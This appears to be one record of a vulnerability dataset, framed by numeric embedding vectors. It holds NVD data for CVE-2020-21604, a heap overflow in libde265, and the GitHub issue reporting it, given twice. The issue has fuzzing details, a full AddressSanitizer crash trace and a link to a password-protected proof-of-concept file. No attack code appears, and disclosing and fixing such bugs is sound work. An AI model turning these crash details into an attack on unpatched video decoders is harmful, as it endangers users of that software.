0.021861109882593155, 0.005851103458553553, 0.012572970241308212, 0.006304183509200811, -0.03233858570456505, 0.02028948813676834, 0.0029149327892810106, 0.0061661358922719955, 0.0036741956137120724, 0.03245185688138008, -0.032933253794908524, 0.0005172368255443871, -0.003897195914760232, 0.02479197084903717, 0.002166288672015071, -0.003557385876774788, -0.0045060222037136555, -0.015801165252923965, 0.01615513302385807, 0.05218915268778801, -0.007157247979193926, 0.0028777660336345434, -0.013797702267765999, -0.00028848453075625, 0.003638798836618662, -0.03095102868974209, 0.02333362028002739, 0.007075835485011339, 0.016381673514842987, 0.009238584898412228, -0.010031474754214287, -0.007341311778873205, 0.0009557156590744853, -0.0011964143486693501, 0.0014264940982684493, 0.01717456430196762, -0.006994422525167465, -0.00941556878387928, -0.009564235806465149, 0.010038553737103939, -0.0050582136027514935, 0.008948329836130142, 0.004810435231775045, 0.008679313585162163, 0.0033290761057287455, 0.0031804093159735203, 0.0013495058519765735, -0.016480784863233566, 0.004417530260980129, -0.00814836099743843, 0.015942752361297607, -0.014668464660644531, 0.003748529125005007, -0.013422494754195213, -0.003748529125005007, -0.010250935330986977, 0.006374977063387632, 0.0072174230590462685, 0.006555501371622086, -0.03805872052907944, -0.0015176410088315606, 0.0005778539925813675, 0.0005747567629441619, -0.0036954337265342474, -0.002545035444200039, 0.0023875192273408175, -0.010173061862587929, 0.023970764130353928, -0.0012955255806446075, -0.007610328029841185, 0.006615675985813141, -0.011284523643553257, 0.00902620330452919, -0.0046157524921, 0.007709439378231764, -0.003575084498152137, 0.0017167484620586038, 0.044656697660684586, -0.011426111683249474, 0.013188875280320644, 0.025103464722633362, 0.006905930582433939, 0.012919859029352665, 0.013372939079999924, -0.0035485366825014353, -0.00710415281355381, 0.006944866850972176, 0.008948329836130142, -0.002780424663797021, 0.014909164048731327, -0.004208688624203205, -0.014420687220990658, 0.008020931854844093, 0.012346429750323296, -0.014979957602918148, -0.025414956733584404, 0.0036706558894366026, 0.010845602490007877, 0.017613485455513, -0.0006070564268156886, -0.003578623989596963, 0.0002699011820368469, 0.012473858892917633, 0.01476757600903511, -0.004371514078229666, -0.011461508460342884, -0.004421069752424955, -0.00037896778667345643, 0.007539534475654364, -0.010286332108080387, -0.020884156227111816, -0.029167024418711662, -0.002614059252664447, 0.00828286912292242, 0.0027892738580703735, -0.016339197754859924, 0.008955409750342369, 0.008870457299053669, -0.0260804183781147, 0.023319462314248085, -0.0038405610248446465, 0.008141281083226204, 0.011185412295162678, -0.01356408279389143, 0.026094576343894005, 0.00951468013226986, 0.0017185183241963387, 0.02465038374066353, -0.02384333498775959, -0.009932363405823708, -0.012813668698072433, -0.005479436367750168, 0.0007530685397796333, -0.015574624761939049, -0.00916071143001318, 0.002693702233955264, -0.04955562576651573, -0.0022229237947613, -0.0026388370897620916, 0.010774808935821056, -0.0016176372300833464, 0.018618756905198097, 0.001184910419397056, 0.00009369110193802044, -0.007518296130001545, 0.001356585300527513, -0.0007738641579635441, 0.0032193458173424006, -0.0014601211296394467, -0.0018813438946381211, 0.0049378639087080956, -0.006031627766788006, -0.012785350903868675, 0.04836628958582878, 0.015079068951308727, 0.011496905237436295, 0.010753571055829525, -0.012714557349681854, 0.015829483047127724, 0.012849065475165844, -0.022370824590325356, -0.01424370240420103, 0.02525920979678631, 0.0038653388619422913, -0.0012256167829036713, 0.020091267302632332, -0.015659578144550323, 0.002309646224603057, -0.0033715523313730955, -0.014420687220990658, -0.0028317500837147236, -0.017231198027729988, -0.017797548323869705, -0.00890585407614708, 0.001798161305487156, 0.021294759586453438, -0.01907183602452278, 0.005826325621455908, -0.005281213670969009, -0.007766074500977993, -0.005203340668231249, 0.018618756905198097, -0.017500214278697968, 0.0034299571998417377, -0.009266901761293411, -0.0020654075779020786, 0.017585167661309242, 0.0009875728283077478, -0.004859990905970335, 0.006003309972584248, 0.01273579616099596, -0.018647074699401855, -0.014583512209355831, -0.0007397946901619434, 0.0029945755377411842, -0.013408336788415909, 0.005267055239528418, 0.01832142286002636, -0.00976953748613596, -0.01383309904485941, -0.009387250989675522, 0.004640530329197645, -0.01771259680390358, 0.0006937787402421236, 0.003854719689115882, 0.002327344613149762, 0.015758689492940903, 0.0019008121453225613, -0.013896813616156578, 0.00938017200678587, -0.008679313585162163, -0.012155286967754364, -0.016509102657437325, -0.009528839029371738, -0.02208765037357807, -0.008134202100336552, 0.011539380997419357, -0.01442776620388031, -0.010088109411299229, 0.025485750287771225, 0.03559509664773941, -0.021492982283234596, 0.00641037430614233, 0.0038264021277427673, -0.00261582899838686, -0.00806340854614973, 0.007921820506453514, -0.01639583334326744, -0.023531842976808548, 0.0045768157579004765, -0.020516028627753258, -0.017939137294888496, 0.0015556926373392344, -0.019666504114866257, -0.0006296219071373343, -0.007709439378231764, -0.0031786393374204636, -0.0018866534810513258, -0.004265323281288147, -0.02053018845617771, -0.021223966032266617, -0.00248486059717834, 0.02644854597747326, 0.023999081924557686, 0.01788250170648098, -0.01361363846808672, -0.006247548386454582, 0.00256981304846704, -0.014654306694865227, -0.0005623678443953395, 0.009521759115159512, 0.0001637105451663956, 0.01574452966451645, 0.005667039658874273, 0.02939356490969658, -0.02136555314064026, 0.00009794979268917814, -0.003791005350649357, -0.023630954325199127, 0.005532531533390284, -0.007263438776135445, -0.010619062930345535, -0.01568789593875408, 0.015418878756463528, 0.00022963722585700452, -0.007907661609351635, -0.003079528221860528, 0.023857494816184044, 0.007005041465163231, 0.011050904169678688, 0.010003156960010529, 0.0014415377518162131, -0.0008415607153438032, 0.0008769576088525355, -0.009790775366127491, 0.036699481308460236, -0.004955562762916088, 0.010151823982596397, -0.018448852002620697, 0.014994116500020027, 0.015079068951308727, 0.002506098710000515, 0.014838370494544506, -0.0015326846623793244, -0.012983573600649834, 0.004693625494837761, 0.014895005151629448, -0.010541189461946487, 0.005865262355655432, -0.0027733452152460814, 0.016140975058078766, 0.02564149722456932, 0.008488170802593231, -0.026561815291643143, 0.03958786651492119, -0.0036494177766144276, -0.006796199828386307, -0.006697088945657015, 0.006420993246138096, -0.015900276601314545, -0.016339197754859924, -0.0017503754934296012, -0.014824211597442627, 0.02279558777809143, 0.008381980471313, 0.013542844913899899, 0.010258014313876629, 0.005192721728235483, 0.0036954337265342474, 0.019935520365834236, 0.008764266036450863, -0.02797769010066986, 0.00022698246175423265, -0.003275980707257986, 0.0036918940022587776, -0.0038370213005691767, 0.01090223714709282, 0.012077413499355316, 0.022937174886465073, -0.009691664017736912, -0.0025768924970179796, 0.02106822095811367, 0.007447502575814724, -0.018477169796824455, -0.009826172143220901, -0.00418391078710556, -0.015574624761939049, 0.019213423132896423, 0.015376402996480465, -0.004867070354521275, 0.000037028450606158, 0.017160404473543167, 0.005065293051302433, 0.009408489800989628, -0.00222646351903677, -0.024423843249678612, 0.02062929980456829, 0.03372614458203316, 0.008134202100336552, -0.016169292852282524, -0.032904934138059616, 0.014434846118092537, 0.004973261151462793, 0.002736178459599614, -0.01907183602452278, 0.014229543507099152, -0.010718174278736115, -0.021280601620674133, 0.029591787606477737, 0.036897704005241394, 0.0013229582691565156, 0.01598522812128067, -0.0008442154503427446, 0.008495249785482883, -0.024239780381321907, -0.006392675451934338, 0.014569354243576527 ]
201
CVE-2020-21604
2021-09-16T22:15:08.093000
libde265 v1.0.4 contains a heap buffer overflow fault in the _mm_loadl_epi64 function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/231" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/strukturag/libde265/issues/231
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# heap-buffer-overflow in decode file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# /opt/asan/bin/dec265 libde265-mm_loadl_epi64-heap_overflow.crash WARNING: maximum number of reference pictures exceeded WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: faulty reference picture list WARNING: coded parameter out of range WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: faulty reference picture list WARNING: faulty reference picture list WARNING: maximum number of reference pictures exceeded WARNING: maximum number of reference pictures exceeded WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: faulty reference picture list WARNING: faulty reference picture list ================================================================= ==129719==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62b000068560 at pc 0x0000004d0359 bp 0x7ffe48aefc20 sp 0x7ffe48aefc10 READ of size 8 at 0x62b000068560 thread T0 #0 0x4d0358 in _mm_loadl_epi64(long long __vector(2) const*) /usr/lib/gcc/x86_64-linux-gnu/5/include/emmintrin.h:704 #1 0x4d0358 in ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*) /root/src/libde265/libde265/x86/sse-motion.cc:987 #2 0x52bf76 in acceleration_functions::put_hevc_epel(short*, long, void const*, long, int, int, int, int, short*, int) const ../libde265/acceleration.h:296 #3 0x52dc7a in void mc_chroma<unsigned short>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned short const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:205 #4 0x51f88a in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:382 #5 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #6 0x47995d in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4310 #7 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #8 0x47b611 in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4636 #9 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #10 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #11 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #12 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #13 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #14 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #15 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #16 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #17 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #18 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #19 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #20 0x7f56cd48d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #21 0x402b28 in _start (/opt/asan/bin/dec265+0x402b28) 0x62b000068560 is located 80 bytes to the right of 25360-byte region [0x62b000062200,0x62b000068510) allocated by thread T0 here: #0 0x7f56ce38e076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x40ee8b in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) /root/src/libde265/libde265/decctx.cc:1418 #6 0x411722 in decoder_context::process_reference_picture_set(slice_segment_header*) /root/src/libde265/libde265/decctx.cc:1648 #7 0x414cc9 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2066 #8 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #9 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #13 0x7f56cd48d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/5/include/emmintrin.h:704 _mm_loadl_epi64(long long __vector(2) const*) Shadow bytes around the buggy address: 0x0c5680005050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c56800050a0: 00 00 fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa 0x0c56800050b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==129719==ABORTING ``` ## POC file [libde265-mm_loadl_epi64-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-mm_loadl_epi64-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap-buffer-overflow in decode file
https://api.github.com/repos/strukturag/libde265/issues/231/comments
3
2019-12-24T03:25:24
2023-01-24T17:40:29Z
https://github.com/strukturag/libde265/issues/231
541,973,882
231
true
This is a GitHub Issue repo:libde265 owner:strukturag Title : heap-buffer-overflow in decode file Issue date: --- start body --- # heap-buffer-overflow in decode file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# /opt/asan/bin/dec265 libde265-mm_loadl_epi64-heap_overflow.crash WARNING: maximum number of reference pictures exceeded WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: faulty reference picture list WARNING: coded parameter out of range WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: faulty reference picture list WARNING: faulty reference picture list WARNING: maximum number of reference pictures exceeded WARNING: maximum number of reference pictures exceeded WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: faulty reference picture list WARNING: faulty reference picture list ================================================================= ==129719==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62b000068560 at pc 0x0000004d0359 bp 0x7ffe48aefc20 sp 0x7ffe48aefc10 READ of size 8 at 0x62b000068560 thread T0 #0 0x4d0358 in _mm_loadl_epi64(long long __vector(2) const*) /usr/lib/gcc/x86_64-linux-gnu/5/include/emmintrin.h:704 #1 0x4d0358 in ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*) /root/src/libde265/libde265/x86/sse-motion.cc:987 #2 0x52bf76 in acceleration_functions::put_hevc_epel(short*, long, void const*, long, int, int, int, int, short*, int) const ../libde265/acceleration.h:296 #3 0x52dc7a in void mc_chroma<unsigned short>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned short const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:205 #4 0x51f88a in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:382 #5 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #6 0x47995d in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4310 #7 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #8 0x47b611 in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4636 #9 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #10 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #11 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #12 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #13 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #14 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #15 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #16 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #17 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #18 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #19 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #20 0x7f56cd48d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #21 0x402b28 in _start (/opt/asan/bin/dec265+0x402b28) 0x62b000068560 is located 80 bytes to the right of 25360-byte region [0x62b000062200,0x62b000068510) allocated by thread T0 here: #0 0x7f56ce38e076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x40ee8b in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) /root/src/libde265/libde265/decctx.cc:1418 #6 0x411722 in decoder_context::process_reference_picture_set(slice_segment_header*) /root/src/libde265/libde265/decctx.cc:1648 #7 0x414cc9 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2066 #8 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #9 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #13 0x7f56cd48d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/5/include/emmintrin.h:704 _mm_loadl_epi64(long long __vector(2) const*) Shadow bytes around the buggy address: 0x0c5680005050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5680005090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c56800050a0: 00 00 fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa 0x0c56800050b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c56800050f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==129719==ABORTING ``` ## POC file [libde265-mm_loadl_epi64-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-mm_loadl_epi64-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs --- end body ---
8,085
[ -0.0430547259747982, 0.031893521547317505, -0.0021901950240135193, 0.009326484985649586, 0.027123253792524338, 0.017414534464478493, -0.02623647265136242, 0.03571585193276405, -0.027138542383909225, 0.03034929931163788, -0.009502312168478966, -0.016420729458332062, -0.016909988597035408, 0.026557547971606255, 0.017705032601952553, 0.013492824509739876, -0.012139719910919666, 0.006853437516838312, -0.010029793716967106, -0.024432333186268806, 0.006727300584316254, -0.043574560433626175, -0.01759800687432289, 0.020808763802051544, -0.01164281740784645, 0.014387249946594238, -0.016237257048487663, -0.012705424800515175, -0.010037438943982124, 0.014830640517175198, 0.007529990281909704, 0.03004351444542408, -0.026160025969147682, -0.006822858937084675, 0.06317546963691711, 0.0073082949966192245, 0.02340794913470745, 0.05100516974925995, 0.00008797331247478724, 0.0052404142916202545, 0.02840755693614483, -0.0504547543823719, -0.047335732728242874, 0.027214989066123962, -0.0021729946602135897, 0.00803453754633665, 0.024676961824297905, -0.011619883589446545, -0.025915397331118584, -0.005863454192876816, 0.007319761905819178, -0.009945702739059925, -0.043635718524456024, -0.06360357254743576, 0.011100046336650848, -0.023973653092980385, 0.03293319419026375, 0.022169513627886772, -0.005511799827218056, 0.009227104485034943, -0.03684725984930992, -0.02236827462911606, 0.006941351108253002, 0.03813156485557556, 0.010396737605333328, 0.0031648892909288406, 0.002643141197040677, 0.023667866364121437, -0.026129446923732758, 0.010144463740289211, -0.020334795117378235, -0.05176963657140732, 0.011275873519480228, 0.03666378930211067, 0.023958364501595497, -0.009372353553771973, 0.013569271191954613, 0.020288927480578423, -0.023729024454951286, 0.03455386310815811, -0.035471223294734955, 0.02117570862174034, -0.04112827032804489, 0.03126665949821472, 0.049843184649944305, -0.005014896858483553, -0.06397051364183426, -0.08188959956169128, -0.03461502119898796, -0.03571585193276405, -0.0067808134481310844, 0.03314724564552307, 0.014555432833731174, 0.010434960946440697, -0.0034343635197728872, 0.02012074552476406, -0.04929276928305626, -0.008218009024858475, -0.06286968290805817, 0.00645591551437974, -0.047794412821531296, 0.012162653729319572, -0.001542310114018619, -0.003021551761776209, 0.0042045628651976585, -0.007637015078216791, -0.003248980501666665, 0.018698837608098984, 0.033422455191612244, 0.12408812344074249, 0.02224596031010151, -0.00473968917503953, 0.007438254076987505, 0.005339794792234898, 0.01206327322870493, 0.004613552242517471, -0.002402334474027157, -0.023958364501595497, -0.0658663883805275, -0.04467539116740227, 0.015434568747878075, -0.03375881910324097, -0.018622390925884247, 0.014853574335575104, -0.011268229223787785, 0.039935704320669174, 0.0006239953800104558, -0.008890739642083645, -0.0025265600997954607, -0.03599105775356293, -0.04672416299581528, -0.03657205402851105, 0.0015728888101875782, -0.02646581269800663, 0.005500332918018103, 0.013095302507281303, -0.01672651618719101, 0.04889524355530739, 0.03733652085065842, 0.010305001400411129, -0.038345612585544586, -0.024432333186268806, 0.004128116182982922, -0.009066566824913025, 0.003713393583893776, 0.016802962869405746, 0.00019708888430614024, -0.0045447503216564655, -0.014188488945364952, -0.0017200484871864319, -0.011268229223787785, -0.005507977679371834, 0.015686841681599617, 0.0061998190358281136, 0.04647953435778618, -0.00847792811691761, 0.02423357218503952, 0.04654068872332573, 0.0039522890001535416, -0.020090166479349136, -0.015059980563819408, -0.036877840757369995, 0.0019407880026847124, -0.04158695042133331, -0.009609337896108627, -0.014639523811638355, 0.021512072533369064, 0.009318840689957142, -0.0012413016520440578, 0.023836050182580948, 0.0051372116431593895, 0.010167397558689117, 0.016160810366272926, 0.052381210029125214, -0.07357221096754074, -0.022628193721175194, 0.03583816438913345, -0.0009379042312502861, -0.028850946575403214, -0.020105455070734024, -0.007919867523014545, 0.004120471887290478, 0.01772032119333744, 0.010175042785704136, 0.010465539060533047, -0.012812450528144836, 0.03378939628601074, -0.03785635530948639, 0.024202993139624596, -0.022689349949359894, 0.0002804634568747133, 0.0023297101724892855, 0.012651911936700344, -0.042229101061820984, 0.02915673330426216, -0.031771205365657806, -0.02024305984377861, -0.017261642962694168, 0.03021169640123844, 0.012797161005437374, 0.013393444009125233, -0.007904578000307083, -0.036816682666540146, 0.006180707365274429, -0.03146541863679886, 0.014471340924501419, -0.012399638071656227, 0.02999764494597912, 0.015518659725785255, -0.009983926080167294, -0.030838558450341225, -0.01514407154172659, 0.011780421249568462, 0.003982868045568466, -0.01889759860932827, 0.014127331785857677, -0.03507370129227638, -0.005286282394081354, -0.032780300825834274, -0.002687097992748022, 0.022551747038960457, -0.018056686967611313, 0.001359793939627707, -0.01654304377734661, -0.06984161585569382, -0.018469497561454773, -0.0024271795991808176, 0.026863334700465202, -0.017338089644908905, -0.012491374276578426, 0.030058803036808968, -0.02235298603773117, 0.023377370089292526, 0.011833933182060719, 0.02394307591021061, -0.022337695583701134, -0.005710560828447342, -0.009494667872786522, -0.0024711363948881626, 0.008210364729166031, -0.023270344361662865, 0.03871255740523338, 0.00223797420039773, -0.028438135981559753, -0.019753800705075264, 0.04892582446336746, -0.020258348435163498, -0.011489924043416977, -0.026618706062436104, 0.002236063126474619, -0.0031209324952214956, -0.03247451409697533, 0.006081326864659786, 0.016099654138088226, -0.001449618604965508, 0.020411241799592972, 0.03926297277212143, -0.010901285335421562, -0.012353770434856415, -0.029034418985247612, 0.038987766951322556, -0.002020101295784116, -0.013806255534291267, -0.014287869445979595, -0.012070918455719948, -0.005255703814327717, 0.016038496047258377, -0.005989591125398874, -0.0049002268351614475, -0.046510111540555954, 0.04115884751081467, -0.007277716416865587, 